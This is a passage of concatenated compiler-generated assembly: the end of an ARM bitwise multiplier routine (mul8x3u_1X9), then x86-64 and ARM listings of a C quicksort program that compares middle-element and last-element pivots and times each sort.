[fp, #-1600] ldr r3, [fp, #-1604] ldr r4, [fp, #-1600] str r3, [fp, #-236] str r4, [fp, #-232] sub r1, fp, #508 ldmia r1, {r0-r1} sub r3, fp, #372 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1612] and r3, r1, r3 str r3, [fp, #-1608] ldr r3, [fp, #-1612] ldr r4, [fp, #-1608] str r3, [fp, #-228] str r4, [fp, #-224] sub r1, fp, #236 ldmia r1, {r0-r1} sub r3, fp, #244 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1620] and r3, r1, r3 str r3, [fp, #-1616] ldr r3, [fp, #-1620] ldr r4, [fp, #-1616] str r3, [fp, #-220] str r4, [fp, #-216] sub r1, fp, #236 ldmia r1, {r0-r1} sub r3, fp, #244 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1628] eor r3, r1, r3 str r3, [fp, #-1624] ldr r3, [fp, #-1628] ldr r4, [fp, #-1624] str r3, [fp, #-212] str r4, [fp, #-208] sub r1, fp, #228 ldmia r1, {r0-r1} sub r3, fp, #220 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1636] orr r3, r1, r3 str r3, [fp, #-1632] ldr r3, [fp, #-1636] ldr r4, [fp, #-1632] str r3, [fp, #-204] str r4, [fp, #-200] sub r1, fp, #468 ldmia r1, {r0-r1} sub r3, fp, #364 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1644] eor r3, r1, r3 str r3, [fp, #-1640] ldr r3, [fp, #-1644] ldr r4, [fp, #-1640] str r3, [fp, #-196] str r4, [fp, #-192] sub r1, fp, #468 ldmia r1, {r0-r1} sub r3, fp, #364 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1652] and r3, r1, r3 str r3, [fp, #-1648] ldr r3, [fp, #-1652] ldr r4, [fp, #-1648] str r3, [fp, #-188] str r4, [fp, #-184] sub r1, fp, #196 ldmia r1, {r0-r1} sub r3, fp, #204 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1660] and r3, r1, r3 str r3, [fp, #-1656] ldr r3, [fp, #-1660] ldr r4, [fp, #-1656] str r3, [fp, #-180] str r4, [fp, #-176] sub r1, fp, #196 ldmia r1, {r0-r1} sub r3, fp, #204 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1668] eor r3, r1, r3 str r3, [fp, #-1664] ldr r3, [fp, #-1668] ldr r4, [fp, #-1664] str r3, [fp, #-172] str r4, [fp, #-168] sub r1, fp, #188 ldmia r1, {r0-r1} sub r3, fp, #180 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1676] orr r3, r1, r3 str r3, [fp, #-1672] ldr r3, [fp, #-1676] ldr r4, [fp, #-1672] str r3, [fp, #-164] str r4, [fp, #-160] sub r1, fp, #428 ldmia r1, {r0-r1} sub r3, fp, #356 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1684] eor r3, r1, r3 str r3, [fp, #-1680] ldr r3, [fp, #-1684] ldr r4, [fp, #-1680] str r3, [fp, #-156] str r4, [fp, #-152] sub r1, fp, #428 ldmia r1, {r0-r1} sub r3, fp, #356 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1692] and r3, r1, r3 str r3, [fp, #-1688] ldr r3, [fp, #-1692] ldr r4, [fp, #-1688] str r3, [fp, #-148] str r4, [fp, #-144] sub r1, fp, #156 ldmia r1, {r0-r1} sub r3, fp, #164 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1700] and r3, r1, r3 str r3, [fp, #-1696] ldr r3, [fp, #-1700] ldr r4, [fp, #-1696] str r3, [fp, #-140] str r4, [fp, #-136] sub r1, fp, #156 ldmia r1, {r0-r1} sub r3, fp, #164 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1708] eor r3, r1, r3 str r3, [fp, #-1704] ldr r3, [fp, #-1708] ldr r4, [fp, #-1704] str r3, [fp, #-132] str r4, [fp, #-128] sub r1, fp, #148 ldmia r1, {r0-r1} sub r3, fp, #140 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1716] orr r3, r1, r3 str r3, [fp, #-1712] ldr r3, [fp, #-1716] ldr r4, [fp, #-1712] str r3, [fp, #-124] str r4, [fp, #-120] sub r1, fp, #404 ldmia r1, {r0-r1} sub r3, fp, #348 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1724] eor r3, r1, r3 str r3, [fp, #-1720] ldr r3, [fp, #-1724] ldr r4, [fp, #-1720] str r3, [fp, #-116] str r4, [fp, #-112] sub r1, fp, #404 ldmia r1, {r0-r1} sub r3, fp, #348 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1732] and r3, r1, r3 str r3, [fp, #-1728] ldr r3, [fp, #-1732] ldr r4, [fp, #-1728] str r3, [fp, #-108] str r4, [fp, #-104] sub r1, fp, #116 ldmia r1, {r0-r1} sub r3, fp, #124 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1740] and r3, r1, r3 str r3, [fp, #-1736] ldr r3, [fp, #-1740] ldr r4, [fp, #-1736] str r3, [fp, #-100] str r4, [fp, #-96] sub r1, fp, #116 ldmia r1, {r0-r1} sub r3, fp, #124 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1748] eor r3, r1, r3 str r3, [fp, #-1744] ldr r3, [fp, #-1748] ldr r4, [fp, #-1744] str r3, [fp, #-92] str r4, [fp, #-88] sub r1, fp, #108 ldmia r1, {r0-r1} sub r3, fp, #100 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1756] orr r3, r1, r3 str r3, [fp, #-1752] ldr r3, [fp, #-1756] ldr r4, [fp, #-1752] str r3, [fp, #-84] str r4, [fp, #-80] sub r1, fp, #412 ldmia r1, {r0-r1} sub r3, fp, #340 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1764] eor r3, r1, r3 str r3, [fp, #-1760] ldr r3, [fp, #-1764] ldr r4, [fp, #-1760] str r3, [fp, #-76] str r4, [fp, #-72] sub r1, fp, #412 ldmia r1, {r0-r1} sub r3, fp, #340 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1772] and r3, r1, r3 str r3, [fp, #-1768] ldr r3, [fp, #-1772] ldr r4, [fp, #-1768] str r3, [fp, #-68] str r4, [fp, #-64] sub r1, fp, #76 ldmia r1, {r0-r1} sub r3, fp, #84 ldmia r3, {r2-r3} and ip, r0, r2 str ip, [fp, #-1780] and r3, r1, r3 str r3, [fp, #-1776] ldr r3, [fp, #-1780] ldr r4, [fp, #-1776] str r3, [fp, #-60] str r4, [fp, #-56] sub r1, fp, #76 ldmia r1, {r0-r1} sub r3, fp, #84 ldmia r3, {r2-r3} eor ip, r0, r2 str ip, [fp, #-1788] eor r3, r1, r3 str r3, [fp, #-1784] ldr r3, [fp, #-1788] ldr r4, [fp, #-1784] str r3, [fp, #-52] str r4, [fp, #-48] sub r1, fp, #68 ldmia r1, {r0-r1} sub r3, fp, #60 ldmia r3, {r2-r3} orr ip, r0, r2 str ip, [fp, #-1796] orr r3, r1, r3 str r3, [fp, #-1792] ldr r3, [fp, #-1796] ldr r4, [fp, #-1792] str r3, [fp, #-44] str r4, [fp, #-40] mov r2, #0 mov r3, #0 str r2, [fp, #-36] str r3, [fp, #-32] sub r1, fp, #780 ldmia r1, {r0-r1} mov r2, #1 mov r3, #0 and ip, r0, r2 str ip, [fp, #-980] and r3, r1, r3 str r3, [fp, #-976] sub r3, fp, #36 ldmia r3, {r2-r3} sub r1, fp, #980 ldmia r1, {r0-r1} mov ip, r0 orr ip, r2, ip str ip, [fp, #-1804] orr r3, r3, r1 str r3, [fp, #-1800] ldr r3, [fp, #-1804] ldr r4, [fp, #-1800] str r3, [fp, #-36] str r4, [fp, #-32] sub r3, fp, #644 ldmia r3, {r2-r3} adds r1, r2, r2 str r1, [fp, #-1812] adc r3, r3, r3 str r3, [fp, #-1808] ldr r0, [fp, #-1812] ldr r1, [fp, #-1808] mov r2, #2 mov r3, #0 and ip, r0, r2 str ip, [fp, #-988] and r3, r1, r3 str r3, [fp, #-984] sub r3, fp, #36 ldmia r3, {r2-r3} sub r1, fp, #988 ldmia r1, {r0-r1} mov ip, r0 orr ip, r2, ip str ip, [fp, #-1820] orr r3, r3, r1 str r3, [fp, #-1816] ldr r3, [fp, #-1820] ldr r4, [fp, #-1816] str r3, [fp, #-36] str r4, [fp, #-32] sub r3, fp, #324 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsl r1, r3, #2 orr r1, r1, r2, lsr #30 lsl r0, r2, #2 mov r2, #4 mov r3, #0 and ip, r0, r2 str ip, [fp, #-996] and r3, r1, r3 str r3, [fp, #-992] sub r3, fp, #36 ldmia r3, {r2-r3} sub r1, fp, #996 ldmia r1, {r0-r1} mov ip, r0 orr ip, r2, ip str ip, [fp, #-1828] orr r3, r3, r1 str r3, [fp, #-1824] ldr r3, [fp, #-1828] ldr r4, [fp, #-1824] str r3, [fp, #-36] str r4, [fp, #-32] sub r3, fp, #292 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsl r1, r3, #3 orr r1, r1, r2, lsr #29 lsl r0, r2, #3 mov r2, #8 mov r3, #0 and ip, r0, r2 str ip, [fp, #-1004] and r3, r1, r3 str r3, [fp, #-1000] sub r3, fp, #36 ldmia r3, {r2-r3} sub r1, fp, #1004 ldmia r1, {r0-r1} mov ip, r0 orr ip, r2, ip str ip, [fp, #-1836] orr r3, r3, r1 str r3, [fp, #-1832] ldr r3, [fp, #-1836] ldr r4, [fp, #-1832] str r3, [fp, #-36] str r4, [fp, #-32] sub r3, fp, #252 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsl r1, r3, #4 orr r1, r1, r2, lsr #28 lsl r0, r2, #4 mov r2, #16 mov r3, #0 and ip, r0, r2 str ip, [fp, #-1012] and r3, r1, r3 str r3, [fp, #-1008] sub r3, fp, #36 ldmia r3, {r2-r3} sub r1, fp, #1012 ldmia r1, {r0-r1} mov ip, r0 orr ip, r2, ip str ip, [fp, #-1844] orr r3, r3, r1 str r3, [fp, #-1840] ldr r3, [fp, #-1844] ldr r4, [fp, #-1840] str r3, [fp, #-36] str r4, [fp, #-32] sub r3, fp, #212 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsl r1, r3, #5 orr r1, r1, r2, lsr #27 lsl r0, r2, #5 mov r2, #32 mov r3, #0 and ip, r0, r2 str ip, [fp, #-1020] and r3, r1, r3 str r3, [fp, #-1016] sub r3, fp, #36 ldmia r3, {r2-r3} sub r1, fp, #1020 ldmia r1, {r0-r1} mov ip, r0 orr ip, r2, ip str ip, [fp, #-1852] orr r3, r3, r1 str r3, [fp, #-1848] ldr r3, [fp, #-1852] ldr r4, [fp, #-1848] str r3, [fp, #-36] str r4, [fp, #-32] sub r3, fp, #172 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsl r1, r3, #6 orr r1, r1, r2, lsr #26 lsl r0, r2, #6 mov r2, #64 mov r3, #0 and ip, r0, r2 str ip, [fp, #-1028] and r3, r1, r3 str r3, [fp, #-1024] sub r3, fp, #36 ldmia r3, {r2-r3} ldr r0, [fp, #-1028] ldr r1, [fp, #-1024] mov ip, r0 orr ip, r2, ip str ip, [fp, #-1860] orr r3, r3, r1 str r3, [fp, #-1856] ldr r3, [fp, #-1860] ldr r4, [fp, #-1856] str r3, [fp, #-36] str r4, [fp, #-32] sub r3, fp, #132 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsl r1, r3, #7 orr r1, r1, r2, lsr #25 lsl r0, r2, #7 mov r2, #255 mov r3, #0 and ip, r0, r2 str ip, [fp, #-1036] and r3, r1, r3 str r3, [fp, #-1032] sub r3, fp, #36 ldmia r3, {r2-r3} ldr r0, [fp, #-1036] ldr r1, [fp, #-1032] mov ip, r0 orr ip, r2, ip str ip, [fp, #-1868] orr r3, r3, r1 str r3, [fp, #-1864] ldr r3, [fp, #-1868] ldr r4, [fp, #-1864] str r3, [fp, #-36] str r4, [fp, #-32] sub r3, fp, #92 ldmia r3, {r2-r3} mov r0, #0 mov r1, #0 lsl r1, r3, #8 orr r1, r1, r2, lsr #24 lsl r0, r2, #8 mov r2, #256 mov r3, #0 and ip, r0, r2 str ip, [fp, #-1044] and r3, r1, r3 str r3, [fp, #-1040] sub r3, fp, #36 ldmia r3, {r2-r3} ldr r0, [fp, #-1044] ldr r1, [fp, #-1040] mov ip, r0 orr ip, r2, ip str ip, [fp, #-1876] orr r3, r3, r1 str r3, [fp, #-1872] ldr r3, [fp, #-1876] ldr r4, [fp, #-1872] str r3, [fp, #-36] str r4, [fp, #-32] sub r1, fp, #52 ldmia r1, {r0-r1} mov r2, #0 mov r3, #0 lsl r3, r1, #9 orr r3, r3, r0, lsr #23 lsl r2, r0, #9 mov r0, #512 mov r1, #0 and ip, r2, r0 str ip, [fp, #-1052] and r3, r3, r1 str r3, [fp, #-1048] sub r3, fp, #36 ldmia r3, {r2-r3} ldr r0, [fp, #-1052] ldr r1, [fp, #-1048] mov ip, r0 orr ip, r2, ip str ip, [fp, #-1884] orr r3, r3, r1 str r3, [fp, #-1880] ldr r3, [fp, #-1884] ldr r4, [fp, #-1880] str r3, [fp, #-36] str r4, [fp, #-32] sub r1, fp, #44 ldmia r1, {r0-r1} mov r2, #0 mov r3, #0 lsl r3, r1, #10 orr r3, r3, r0, lsr #22 lsl r2, r0, #10 mov r0, #1024 mov r1, #0 and ip, r2, r0 str ip, [fp, #-1060] and r3, r3, r1 str r3, [fp, #-1056] sub r3, fp, #36 ldmia r3, {r2-r3} ldr r0, [fp, #-1060] ldr r1, [fp, #-1056] mov ip, r0 orr ip, r2, ip str ip, [fp, #-1892] orr r3, r3, r1 str r3, [fp, #-1888] ldr r3, [fp, #-1892] ldr r4, [fp, #-1888] str r3, [fp, #-36] str r4, [fp, #-32] sub r3, fp, #36 ldmia r3, {r2-r3} mov r0, r2 mov r1, r3 sub sp, fp, #24 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp} bx lr .size mul8x3u_1X9, .-mul8x3u_1X9 .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "560145.c" .intel_syntax noprefix .text .globl n .bss .align 4 .type n, @object .size n, 4 n: .zero 4 .text .globl swap .type swap, @function swap: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] mov DWORD PTR -4[rbp], eax mov rax, QWORD PTR -32[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR -24[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -32[rbp] mov edx, DWORD PTR -4[rbp] mov DWORD PTR [rax], edx nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size swap, .-swap .section .rodata .LC0: .string "%d " .text .globl print .type print, @function print: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -28[rbp], esi mov DWORD PTR -4[rbp], 0 jmp .L3 .L4: mov eax, DWORD PTR -4[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rdx mov eax, DWORD PTR [rax] mov esi, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT add DWORD PTR -4[rbp], 1 .L3: mov eax, DWORD PTR -4[rbp] cmp eax, DWORD PTR -28[rbp] jl .L4 nop nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size print, .-print .globl partition .type partition, @function partition: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -28[rbp], esi mov DWORD PTR -32[rbp], edx mov eax, DWORD PTR -32[rbp] mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -28[rbp] sub eax, 1 mov DWORD PTR -12[rbp], eax mov eax, DWORD PTR -28[rbp] mov DWORD PTR -8[rbp], eax jmp .L6 .L8: mov eax, DWORD PTR -8[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rdx mov edx, DWORD PTR [rax] mov eax, DWORD PTR -4[rbp] cdqe lea rcx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rcx mov eax, DWORD PTR [rax] cmp edx, eax jge .L7 add DWORD PTR -12[rbp], 1 mov eax, DWORD PTR -8[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rdx, rax mov eax, DWORD PTR -12[rbp] cdqe lea rcx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rcx mov rsi, rdx mov rdi, rax call swap .L7: add DWORD PTR -8[rbp], 1 .L6: mov eax, DWORD PTR -8[rbp] cmp eax, DWORD PTR -32[rbp] jle .L8 mov eax, DWORD PTR -4[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rdx, rax mov eax, DWORD PTR -12[rbp] cdqe add rax, 1 lea rcx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rcx mov rsi, rdx mov rdi, rax call swap mov eax, DWORD PTR -12[rbp] add eax, 1 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size partition, .-partition .globl qs_last .type qs_last, @function qs_last: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -28[rbp], esi mov DWORD PTR -32[rbp], edx mov eax, DWORD PTR -28[rbp] cmp eax, DWORD PTR -32[rbp] jge .L11 mov edx, DWORD PTR -32[rbp] mov ecx, DWORD PTR -28[rbp] mov rax, QWORD PTR -24[rbp] mov esi, ecx mov rdi, rax call partition mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] lea edx, -1[rax] mov ecx, DWORD PTR -28[rbp] mov rax, QWORD PTR -24[rbp] mov esi, ecx mov rdi, rax call qs_last mov eax, DWORD PTR -4[rbp] lea ecx, 1[rax] mov edx, DWORD PTR -32[rbp] mov rax, QWORD PTR -24[rbp] mov esi, ecx mov rdi, rax call qs_last .L11: nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size qs_last, .-qs_last .globl qs_mid .type qs_mid, @function qs_mid: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -28[rbp], esi mov DWORD PTR -32[rbp], edx mov eax, DWORD PTR -28[rbp] cmp eax, DWORD PTR -32[rbp] jge .L21 mov eax, DWORD PTR -28[rbp] mov DWORD PTR -12[rbp], eax mov eax, DWORD PTR -32[rbp] mov DWORD PTR -8[rbp], eax mov edx, DWORD PTR -28[rbp] mov eax, DWORD PTR -32[rbp] add eax, edx mov edx, eax shr edx, 31 add eax, edx sar eax mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rdx mov eax, DWORD PTR [rax] mov DWORD PTR -4[rbp], eax jmp .L15 .L17: add DWORD PTR -12[rbp], 1 .L16: mov eax, DWORD PTR -12[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rdx mov eax, DWORD PTR [rax] cmp DWORD PTR -4[rbp], eax jg .L17 jmp .L18 .L19: sub DWORD PTR -8[rbp], 1 .L18: mov eax, DWORD PTR -8[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rdx mov eax, DWORD PTR [rax] cmp DWORD PTR -4[rbp], eax jl .L19 mov eax, DWORD PTR -12[rbp] cmp eax, DWORD PTR -8[rbp] jg .L15 mov eax, DWORD PTR -8[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rdx, rax mov eax, DWORD PTR -12[rbp] cdqe lea rcx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rcx mov rsi, rdx mov rdi, rax call swap add DWORD PTR -12[rbp], 1 sub DWORD PTR -8[rbp], 1 .L15: mov eax, DWORD PTR -12[rbp] cmp eax, DWORD PTR -8[rbp] jle .L16 mov eax, DWORD PTR -12[rbp] lea edx, -1[rax] mov ecx, DWORD PTR -28[rbp] mov rax, QWORD PTR -24[rbp] mov esi, ecx mov rdi, rax call qs_mid mov edx, DWORD PTR -32[rbp] mov ecx, DWORD PTR -12[rbp] mov rax, QWORD PTR -24[rbp] mov esi, ecx mov rdi, rax call qs_mid jmp .L12 .L21: nop .L12: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size qs_mid, .-qs_mid .section .rodata .align 8 .LC1: .string "Enter the number of elements: " .LC2: .string "%d" .LC3: .string "Unsorted array: " .align 8 .LC5: .string "\nSorted array with middle element as pivot: " .LC7: .string "\nIt took %fms" .align 8 .LC8: .string "\nSorted array with last element as pivot: " .text .globl main .type main, @function main: .LFB11: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push r15 push r14 push r13 push r12 push rbx sub rsp, 120 .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 .cfi_offset 3, -56 mov rax, QWORD PTR fs:40 mov QWORD PTR -56[rbp], rax xor eax, eax mov rax, rsp mov rbx, rax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT lea rsi, n[rip] lea rdi, .LC2[rip] mov eax, 0 call __isoc99_scanf@PLT mov eax, DWORD PTR n[rip] movsx rdx, eax sub rdx, 1 mov QWORD PTR -112[rbp], rdx movsx rdx, eax mov QWORD PTR -144[rbp], rdx mov QWORD PTR -136[rbp], 0 movsx rdx, eax mov QWORD PTR -160[rbp], rdx mov QWORD PTR -152[rbp], 0 cdqe lea rdx, 0[0+rax*4] mov eax, 16 sub rax, 1 add rax, rdx mov esi, 16 mov edx, 0 div rsi imul rax, rax, 16 mov rcx, rax and rcx, -4096 mov rdx, rsp sub rdx, rcx .L23: cmp rsp, rdx je .L24 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L23 .L24: mov rdx, rax and edx, 4095 sub rsp, rdx mov rdx, rax and edx, 4095 test rdx, rdx je .L25 and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L25: mov rax, rsp add rax, 3 shr rax, 2 sal rax, 2 mov QWORD PTR -104[rbp], rax mov eax, DWORD PTR n[rip] movsx rdx, eax sub rdx, 1 mov QWORD PTR -96[rbp], rdx movsx rdx, eax mov r14, rdx mov r15d, 0 movsx rdx, eax mov r12, rdx mov r13d, 0 cdqe lea rdx, 0[0+rax*4] mov eax, 16 sub rax, 1 add rax, rdx mov esi, 16 mov edx, 0 div rsi imul rax, rax, 16 mov rcx, rax and rcx, -4096 mov rdx, rsp sub rdx, rcx .L26: cmp rsp, rdx je .L27 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L26 .L27: mov rdx, rax and edx, 4095 sub rsp, rdx mov rdx, rax and edx, 4095 test rdx, rdx je .L28 and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L28: mov rax, rsp add rax, 3 shr rax, 2 sal rax, 2 mov QWORD PTR -88[rbp], rax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov DWORD PTR -116[rbp], 0 jmp .L29 .L30: mov rax, QWORD PTR -104[rbp] mov edx, DWORD PTR -116[rbp] movsx rdx, edx mov ecx, DWORD PTR -116[rbp] mov DWORD PTR [rax+rdx*4], ecx mov rax, QWORD PTR -104[rbp] mov edx, DWORD PTR -116[rbp] movsx rdx, edx mov ecx, DWORD PTR [rax+rdx*4] mov rax, QWORD PTR -88[rbp] mov edx, DWORD PTR -116[rbp] movsx rdx, edx mov DWORD PTR [rax+rdx*4], ecx add DWORD PTR -116[rbp], 1 .L29: mov eax, DWORD PTR n[rip] cmp DWORD PTR -116[rbp], eax jl .L30 call clock@PLT mov QWORD PTR -80[rbp], rax mov eax, DWORD PTR n[rip] lea edx, -1[rax] mov rax, QWORD PTR -104[rbp] mov esi, 0 mov rdi, rax call qs_mid call clock@PLT mov QWORD PTR -72[rbp], rax mov rax, QWORD PTR -72[rbp] sub rax, QWORD PTR -80[rbp] pxor xmm0, xmm0 cvtsi2sd xmm0, rax movsd xmm1, QWORD PTR .LC4[rip] divsd xmm0, xmm1 movsd QWORD PTR -64[rbp], xmm0 lea rdi, .LC5[rip] mov eax, 0 call printf@PLT movsd xmm1, QWORD PTR -64[rbp] movsd xmm0, QWORD PTR .LC6[rip] mulsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax lea rdi, .LC7[rip] mov eax, 1 call printf@PLT call clock@PLT mov QWORD PTR -80[rbp], rax mov eax, DWORD PTR n[rip] lea edx, -1[rax] mov rax, QWORD PTR -88[rbp] mov esi, 0 mov rdi, rax call qs_last call clock@PLT mov QWORD PTR -72[rbp], rax mov rax, QWORD PTR -72[rbp] sub rax, QWORD PTR -80[rbp] pxor xmm0, xmm0 cvtsi2sd xmm0, rax movsd xmm1, QWORD PTR .LC4[rip] divsd xmm0, xmm1 movsd QWORD PTR -64[rbp], xmm0 lea rdi, .LC8[rip] mov eax, 0 call printf@PLT movsd xmm1, QWORD PTR -64[rbp] movsd xmm0, QWORD PTR .LC6[rip] mulsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax lea rdi, .LC7[rip] mov eax, 1 call printf@PLT mov rsp, rbx mov eax, 0 mov rbx, QWORD PTR -56[rbp] sub rbx, QWORD PTR fs:40 je .L32 call __stack_chk_fail@PLT .L32: lea rsp, -40[rbp] pop rbx pop r12 pop r13 pop r14 pop r15 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE11: .size main, .-main .section .rodata .align 8 .LC4: .long 0 .long 1093567616 .align 8 .LC6: .long 0 .long 1083129856 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "560145.c" .text .comm n,4,4 .align 2 .global swap .syntax unified .arm .fpu softvfp .type swap, %function swap: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-16] str r1, [fp, #-20] ldr r3, [fp, #-16] ldr r3, [r3] str r3, [fp, #-8] ldr r3, [fp, #-20] ldr r2, [r3] ldr r3, [fp, #-16] str r2, [r3] ldr r3, [fp, #-20] ldr r2, [fp, #-8] str r2, [r3] nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size swap, .-swap .section .rodata .align 2 .LC0: .ascii "%d \000" .text .align 2 .global print .syntax unified .arm .fpu softvfp .type print, %function print: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] mov r3, #0 str r3, [fp, #-8] b .L3 .L4: ldr r3, [fp, #-8] lsl r3, r3, #2 ldr r2, [fp, #-16] add r3, r2, r3 ldr r3, [r3] mov r1, r3 ldr r0, .L5 bl printf ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L3: ldr r2, [fp, #-8] ldr r3, [fp, #-20] cmp r2, r3 blt .L4 nop nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L6: .align 2 .L5: .word .LC0 .size print, .-print .align 2 .global partition .syntax unified .arm .fpu softvfp .type partition, %function partition: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #32 str r0, [fp, #-24] str r1, [fp, #-28] str r2, [fp, #-32] ldr r3, [fp, #-32] str r3, [fp, #-8] ldr r3, [fp, #-28] sub r3, r3, #1 str r3, [fp, #-16] ldr r3, [fp, #-28] str r3, [fp, #-12] b .L8 .L10: ldr r3, [fp, #-12] lsl r3, r3, #2 ldr r2, [fp, #-24] add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-8] lsl r3, r3, #2 ldr r1, [fp, #-24] add r3, r1, r3 ldr r3, [r3] cmp r2, r3 bge .L9 ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] ldr r3, [fp, #-16] lsl r3, r3, #2 ldr r2, [fp, #-24] add r0, r2, r3 ldr r3, [fp, #-12] lsl r3, r3, #2 ldr r2, [fp, #-24] add r3, r2, r3 mov r1, r3 bl swap .L9: ldr r3, [fp, #-12] add r3, r3, 